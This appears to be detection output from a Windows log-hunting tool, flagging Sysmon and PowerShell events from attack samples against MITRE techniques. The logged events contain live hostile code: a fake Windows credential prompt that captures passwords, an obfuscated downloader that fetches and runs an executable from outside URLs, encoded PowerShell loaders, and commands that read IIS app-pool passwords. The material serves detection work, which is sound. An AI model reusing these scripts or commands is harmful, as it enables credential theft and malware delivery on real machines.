1123 + + + + + Microsoft-Windows-PowerShell/Operational + MSEDGEWIN10 + + + + + 1 + 1 + function Invoke-LoginPrompt{ +$cred = $Host.ui.PromptForCredential("Windows Security", "Please enter user credentials", "$env:userdomain\$env:username","") +$username = "$env:username" +$domain = "$env:userdomain" +$full = "$domain" + "\" + "$username" +$password = $cred.GetNetworkCredential().password +Add-Type -assemblyname System.DirectoryServices.AccountManagement +$DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine) +while($DS.ValidateCredentials("$full","$password") -ne $True){ + $cred = $Host.ui.PromptForCredential("Windows Security", "Invalid Credentials, Please try again", "$env:userdomain\$env:username","") + $username = "$env:username" + $domain = "$env:userdomain" + $full = "$domain" + "\" + "$username" + $password = $cred.GetNetworkCredential().password + Add-Type -assemblyname System.DirectoryServices.AccountManagement + $DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine) + $DS.ValidateCredentials("$full", 
"$password") | out-null + } + $output = $newcred = $cred.GetNetworkCredential() | select-object UserName, Domain, Password + $output + R{START_PROCESS} +} +Invoke-LoginPrompt + c7ca7056-b317-4fff-b796-05d8ef896dcd + + +",MSEDGEWIN10,Microsoft-Windows-PowerShell/Operational +powershell script block - Found Suspicious PowerShell commands ,1598418568.845521,2020-08-26T09:09:28.845521+04:00,,Threat,Critical,"Found Suspicious PowerShell commands that include (Net.WebClient,Net.WebClient,Net.WebClient,Net.WebClient,$env:TEMP\,char,-f , -Force,foreach,$Env:Temp\,Net.WebClient) , check event details ",4104," + + + + + 4104 + 1 + 5 + 2 + 15 + 0x0 + + + 683 + + + + + Microsoft-Windows-PowerShell/Operational + DESKTOP-RIPCLIP + + + + + 1 + 1 + $Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') 
neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0') + fdd51159-9602-40cb-839d-c31039ebbc3a + + +",DESKTOP-RIPCLIP,Microsoft-Windows-PowerShell/Operational +powershell script block - Found Suspicious PowerShell commands ,1568036109.31523,2019-09-09T17:35:09.315230+04:00,,Threat,Critical,"Found Suspicious PowerShell commands that include (FromBase64String,Base64,New-Object,New-Object,new-object,readtoend,system.io.streamreader) , check event details ",4104," + + + + + 4104 + 1 + 3 + 2 + 15 + 0x0 + + + 1122 + + + + + Microsoft-Windows-PowerShell/Operational + MSEDGEWIN10 + + + + + 1 + 1 + &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object 
System.IO.MemoryStream(,[System.Convert]::FromBase64String('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'))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) + 37f6d110-cfdf-4118-8748-17638e258531 + + +",MSEDGEWIN10,Microsoft-Windows-PowerShell/Operational +[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (LAPTOP-JU4M3I0E\bouss) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 2164892 + + + + + Microsoft-Windows-Sysmon/Operational + LAPTOP-JU4M3I0E + + + + + + 2020-10-05 20:43:58.450 + 00247C92-858E-5F7B-0000-0010E741202B + 6636 + C:\Windows\System32\cmd.exe + 10.0.18362.449 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + cmd.exe + C:\windows\ + LAPTOP-JU4M3I0E\bouss + 00247C92-8C36-5F75-0000-002034E39103 + 0x391e334 + 2 + High + SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 00247C92-858E-5F7B-0000-00105241202B + 18404 + C:\Windows\System32\Taskmgr.exe + C:\windows\system32\taskmgr.exe + +",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational +Prohibited Process connecting to internet,1556808617.955524,2019-05-02T18:50:17.955524+04:00,,Threat,Critical,"User (IEWIN7\IEUser) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( IEWIN7.home and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 151.101.36.133 ) and port ( 443 )",3," + + + + + 3 + 5 + 4 + 3 + 0 + 0x8000000000000000 + + + 10272 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-02 14:48:51.664 + 365ABB72-0244-5CCB-0000-00109AE70B00 + 1508 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + IEWIN7\IEUser + tcp + true + false + 
10.0.2.15 + IEWIN7.home + 49178 + + false + 151.101.36.133 + + 443 + https + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1082] System Information Discovery,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami) ,1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 339891 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-08-02 16:24:28.637 + 747F3D96-E8BC-5F26-0000-0010F7C41A00 + 588 + C:\Windows\System32\whoami.exe + 10.0.17763.1 (WinBuild.160101.0800) + whoami - displays logged on user information + Microsoft® Windows® Operating System + Microsoft Corporation + whoami.exe + whoami + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-E308-5F26-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88 + 747F3D96-E8BA-5F26-0000-001035BE1A00 + 8104 + C:\Windows\System32\cmd.exe + "c:\windows\system32\cmd.exe" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1053] Scheduled Task - Process,1619129375.284604,2021-04-23T02:09:35.284604+04:00,,Threat,Low,Found User (NT AUTHORITY\LOCAL SERVICE) running image ( C:\Windows\System32\svchost.exe ) through command line ( C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 564605 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2021-04-22 22:09:35.263 + 747F3D96-F41F-6081-0000-001078834A00 + 6644 + C:\Windows\System32\svchost.exe + 10.0.17763.1 (WinBuild.160101.0800) + Host Process for Windows Services + Microsoft® Windows® Operating System + Microsoft Corporation + svchost.exe + C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost + C:\Windows\system32\ + NT AUTHORITY\LOCAL SERVICE + 
747F3D96-6E1A-6082-0000-0020E5030000 + 0x3e5 + 0 + System + SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69 + 00000000-0000-0000-0000-000000000000 + 624 + ? + ? + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1596385468.64099,2020-08-02T20:24:28.640990+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( "c:\windows\system32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 339890 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-08-02 16:24:26.803 + 747F3D96-E8BA-5F26-0000-001035BE1A00 + 8104 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + "c:\windows\system32\cmd.exe" + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-E308-5F26-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-E309-5F26-0000-0010137B0000 + 820 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k DcomLaunch -p + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[ T1003 ] Credential Dumping ImageLoad,1555606895.720774,2019-04-18T21:01:35.720774+04:00,,Threat,Medium,[ T1003 ] Credential Dumping ImageLoad,7," + + + + + 7 + 3 + 4 + 7 + 0 + 0x8000000000000000 + + + 29 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + technique_id=T1003,technique_name=Credential Dumping + 2019-04-18 17:01:35.680 + 365ABB72-AC28-5CB8-0000-0010F3F70700 + 1200 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + C:\Windows\System32\vaultcli.dll + 6.1.7600.16385 
(win7_rtm.090713-1255) + Credential Vault Client Library + Microsoft® Windows® Operating System + Microsoft Corporation + SHA1=9A398500E906FA979C21CD9F19C929FE798AF9EF,MD5=36B8D5903CEEF0AA42A1EE002BD27FF1,SHA256=CBD5C4D0E05B9A2657D816B655FFFC386807061594DEAABA754658D3152F7403,IMPHASH=55954B415EBB6BF5B592831A5E07DC56 + true + Microsoft Windows + Valid + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,1555606895.720774,2019-04-18T21:01:35.720774+04:00,,Threat,High,[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,7," + + + + + 7 + 3 + 4 + 7 + 0 + 0x8000000000000000 + + + 29 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + technique_id=T1003,technique_name=Credential Dumping + 2019-04-18 17:01:35.680 + 365ABB72-AC28-5CB8-0000-0010F3F70700 + 1200 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + C:\Windows\System32\vaultcli.dll + 6.1.7600.16385 (win7_rtm.090713-1255) + Credential Vault Client Library + Microsoft® Windows® Operating System + Microsoft Corporation + SHA1=9A398500E906FA979C21CD9F19C929FE798AF9EF,MD5=36B8D5903CEEF0AA42A1EE002BD27FF1,SHA256=CBD5C4D0E05B9A2657D816B655FFFC386807061594DEAABA754658D3152F7403,IMPHASH=55954B415EBB6BF5B592831A5E07DC56 + true + Microsoft Windows + Valid + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920557.731362,2019-05-27T05:29:17.731362+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "Filename: redirection.config" /text:processmodel.password ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5898 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:17.691 + 365ABB72-3D6D-5CEB-0000-00104474FF00 + 2448 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 
(win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "Filename: redirection.config" /text:processmodel.password + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 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 + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1003.001] Credential dump Thread Open to Lsass,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,Process ( \\VBOXSVR\HTools\voice_mail.msg.exe) attempted to access lsass process ( C:\Windows\System32\lsass.exe),8," + + + + + 8 + 2 + 4 + 8 + 0 + 0x8000000000000000 + + + 9066 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-30 12:43:43.784 + 365ABB72-4055-5CC8-0000-0010769D0B00 + 1532 + \\VBOXSVR\HTools\voice_mail.msg.exe + 365ABB72-3FE0-5CC8-0000-00107E590000 + 492 + C:\Windows\System32\lsass.exe + 3656 + 0x001A0000 + + + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1584766825.425419,2020-03-21T09:00:25.425419+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243552 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.397 + 747F3D96-9F69-5E75-0000-001033922000 + 6572 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + 
Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.425419,2020-03-21T09:00:25.425419+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243552 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.397 + 747F3D96-9F69-5E75-0000-001033922000 + 6572 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line 
Interface,1558920557.661261,2019-05-27T05:29:17.661261+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "Filename: redirection.config" /text:processmodel.username ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5895 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:17.621 + 365ABB72-3D6D-5CEB-0000-00108270FF00 + 1340 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "Filename: redirection.config" /text:processmodel.username + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 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 + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1584766825.425419,2020-03-21T09:00:25.425419+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243552 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.397 + 747F3D96-9F69-5E75-0000-001033922000 + 6572 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® 
Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[ T1003 ] Credential Dumping ImageLoad,1555606894.689291,2019-04-18T21:01:34.689291+04:00,,Threat,Medium,[ T1003 ] Credential Dumping ImageLoad,7," + + + + + 7 + 3 + 4 + 7 + 0 + 0x8000000000000000 + + + 27 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + technique_id=T1003,technique_name=Credential Dumping + 2019-04-18 17:01:34.629 + 365ABB72-AC28-5CB8-0000-0010F3F70700 + 1200 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + C:\Windows\System32\hid.dll + 6.1.7600.16385 (win7_rtm.090713-1255) + Hid User Library + Microsoft® Windows® Operating System + Microsoft Corporation + SHA1=1BC4F63F2111059372F02E0B3893A38589B38688,MD5=63DF770DF74ACB370EF5A16727069AAF,SHA256=B8F96336BF87F1153C245D19606CBD10FBE7CF2795BCC762F2A1B57CB7C39116,IMPHASH=480C71617B8C5E2173781DA9C5B742AE + true + Microsoft Windows + Valid + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,1555606894.689291,2019-04-18T21:01:34.689291+04:00,,Threat,High,[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,7," + + + + + 7 + 3 + 4 + 7 + 0 + 0x8000000000000000 + + + 27 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + technique_id=T1003,technique_name=Credential Dumping + 2019-04-18 17:01:34.629 + 365ABB72-AC28-5CB8-0000-0010F3F70700 + 1200 + 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + C:\Windows\System32\hid.dll + 6.1.7600.16385 (win7_rtm.090713-1255) + Hid User Library + Microsoft® Windows® Operating System + Microsoft Corporation + SHA1=1BC4F63F2111059372F02E0B3893A38589B38688,MD5=63DF770DF74ACB370EF5A16727069AAF,SHA256=B8F96336BF87F1153C245D19606CBD10FBE7CF2795BCC762F2A1B57CB7C39116,IMPHASH=480C71617B8C5E2173781DA9C5B742AE + true + Microsoft Windows + Valid + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920557.581146,2019-05-27T05:29:17.581146+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.password ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5892 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:17.420 + 365ABB72-3D6D-5CEB-0000-0010576BFF00 + 2928 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.password + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 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 + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1082] System Information Discovery,1584794166.990686,2020-03-21T16:36:06.990686+04:00,,Threat,Critical,System Information Discovery Process ( 
C:\Windows\System32\whoami.exe) ith commandline ( whoami) ,1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 244341 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 12:36:03.899 + 747F3D96-0A33-5E76-0000-0010B8813D00 + 3696 + C:\Windows\System32\whoami.exe + 10.0.17763.1 (WinBuild.160101.0800) + whoami - displays logged on user information + Microsoft® Windows® Operating System + Microsoft Corporation + whoami.exe + whoami + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-069C-5E76-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88 + 747F3D96-08DA-5E76-0000-001054382E00 + 2632 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1053] Scheduled Task manipulation ,1558843303.567204,2019-05-26T08:01:43.567204+04:00,,Threat,Medium,"Found User (NT AUTHORITY\SYSTEM) Trying to run taskeng.exe or svchost.exe with Command Line (C:\Windows\system32\svchost.exe) and Parent Image :C:\Users\IEUser\Desktop\info.rar\jjs.exe , Parent CommandLine ("C:\Users\IEUser\Desktop\info.rar\jjs.exe") in directory : ( C:\Windows\system32\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4863 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-26 04:01:43.557 + 365ABB72-0FA7-5CEA-0000-001064C60A00 + 3908 + C:\Windows\System32\svchost.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Host Process for Windows Services + Microsoft® Windows® Operating System + Microsoft Corporation + C:\Windows\system32\svchost.exe + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-8DBD-5CEA-0000-0020E7030000 + 0x3e7 + 0 + System + 
SHA1=4AF001B3C3816B860660CF2DE2C0FD3C1DFB4878,MD5=54A47F6B5E09A77E61649109C6A08866,SHA256=121118A0F5E0E8C933EFD28C9901E54E42792619A8A3A6D11E1F0025A7324BC2,IMPHASH=58E185299ECCA757FE68BA83A6495FDE + 365ABB72-0FA6-5CEA-0000-0010FEC30A00 + 3884 + C:\Users\IEUser\Desktop\info.rar\jjs.exe + "C:\Users\IEUser\Desktop\info.rar\jjs.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1053] Scheduled Task - Process,1558843303.567204,2019-05-26T08:01:43.567204+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\svchost.exe ) through command line ( C:\Windows\system32\svchost.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4863 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-26 04:01:43.557 + 365ABB72-0FA7-5CEA-0000-001064C60A00 + 3908 + C:\Windows\System32\svchost.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Host Process for Windows Services + Microsoft® Windows® Operating System + Microsoft Corporation + C:\Windows\system32\svchost.exe + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-8DBD-5CEA-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=4AF001B3C3816B860660CF2DE2C0FD3C1DFB4878,MD5=54A47F6B5E09A77E61649109C6A08866,SHA256=121118A0F5E0E8C933EFD28C9901E54E42792619A8A3A6D11E1F0025A7324BC2,IMPHASH=58E185299ECCA757FE68BA83A6495FDE + 365ABB72-0FA6-5CEA-0000-0010FEC30A00 + 3884 + C:\Users\IEUser\Desktop\info.rar\jjs.exe + "C:\Users\IEUser\Desktop\info.rar\jjs.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[ T1003 ] Credential Dumping ImageLoad,1555606894.659248,2019-04-18T21:01:34.659248+04:00,,Threat,Medium,[ T1003 ] Credential Dumping ImageLoad,7," + + + + + 7 + 3 + 4 + 7 + 0 + 0x8000000000000000 + + + 26 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + technique_id=T1003,technique_name=Credential Dumping + 2019-04-18 17:01:34.418 + 365ABB72-AC28-5CB8-0000-0010F3F70700 + 1200 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 
